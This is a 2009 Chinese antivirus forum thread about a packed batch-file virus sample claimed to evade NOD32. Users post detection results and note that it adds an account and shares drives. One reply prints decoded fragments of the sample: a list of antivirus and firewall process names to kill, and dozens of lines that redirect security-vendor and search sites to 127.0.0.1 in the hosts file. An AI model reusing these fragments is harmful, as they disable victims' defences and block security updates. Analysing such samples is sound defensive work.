我朋友给病毒加了壳！他说免杀NOD32！

显示全部楼层 · 发表于 2009-7-27 10:56:26

date/time: 2009-7-27 10:55:53
filename: yangben.rar
original path: c:\Documents and Settings\Administrator\桌面\
filesize: 66.09 KB
virusname: Generic.Qhost
suggestion: Save & Delete
signatureId: 914441

显示全部楼层 · 发表于 2009-7-27 11:41:57

瑞星2010为什么清除了病毒，让我重启，却增加了个账户，C D盘全共享了？郁闷，瑞星我对你2次失望。

显示全部楼层 · 发表于 2009-7-27 11:54:33

无壳bat

显示全部楼层 · 发表于 2009-7-27 11:54:57

确实过了

显示全部楼层 · 发表于 2009-7-27 13:01:53

原帖由 strawman0719 于 2009-7-27 00:13 发表
@echo off
%na2q%
%random%%random%%random%%random%%random%%random%%random%
%1xp5%
%random%%random%%random%%random%%random%%random%%random%
%bcsw%
%random%%random%%random%%random%%random%%random%% ...

看来不过如此[:26:]

显示全部楼层 · 发表于 2009-7-27 13:10:49

一个asp木马加一个批处理，添加新帐户后会被远程控制，C盘共享为了能拿到管理员权限，可是，这样的病毒只有用社工才会有人上当运行吧

显示全部楼层 · 发表于 2009-7-27 13:15:30

%Q博士% norton*
%Q博士% av*
%Q博士% fire*
%Q博士% anti*
%Q博士% spy*
%Q博士% bullguard
%Q博士% PersFw
%Q博士% KAV*
%Q博士% ZONEALARM
%Q博士% SAFEWEB
%Q博士% OUTPOST
%Q博士% nv*
%Q博士% nav*
%Q博士% F-*
%Q博士% ESAFE
%Q博士% cle
%Q博士% BLACKICE
%Q博士% def*
这几个关键进程杀掉

%Q博士2% 127.0.0.1 www.google.com > %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.google.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.symantec.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.free-av.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.free-av.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.antivir.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.antivir.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.kaspersky.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.kaspersky.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.microsoft.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.microsoft.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.sophos.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.sophos.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.symantec.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.hijackthis.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.spychecker.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.trendmicro.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.trendmicro.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.yahoo.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.yahoo.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.lycos.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 www.lycos.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 google.com > %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 google.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 symantec.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 free-av.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 free-av.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 antivir.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 antivir.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 kaspersky.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 kaspersky.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 microsoft.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 microsoft.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 sophos.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 sophos.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 symantec.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 hijackthis.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 spychecker.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 trendmicro.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 trendmicro.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 lavasoftusa.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 yahoo.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 yahoo.de >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 lycos.com >> %windir%\system32\drivers\etc\hosts
%Q博士2% 127.0.0.1 lycos.de >> %windir%\system32\drivers\etc\hosts

这几个网站在host里指向127.0.0.1

显示全部楼层 · 发表于 2009-7-27 13:53:07

为什么运行Q博士微丶不拦截阿

显示全部楼层 · 发表于 2009-7-27 13:59:35

AVG
受感染的 BAT/Generic";

显示全部楼层 · 发表于 2009-7-27 18:11:39

红伞轻松干掉

[病毒样本] 我朋友给病毒加了壳！他说免杀NOD32！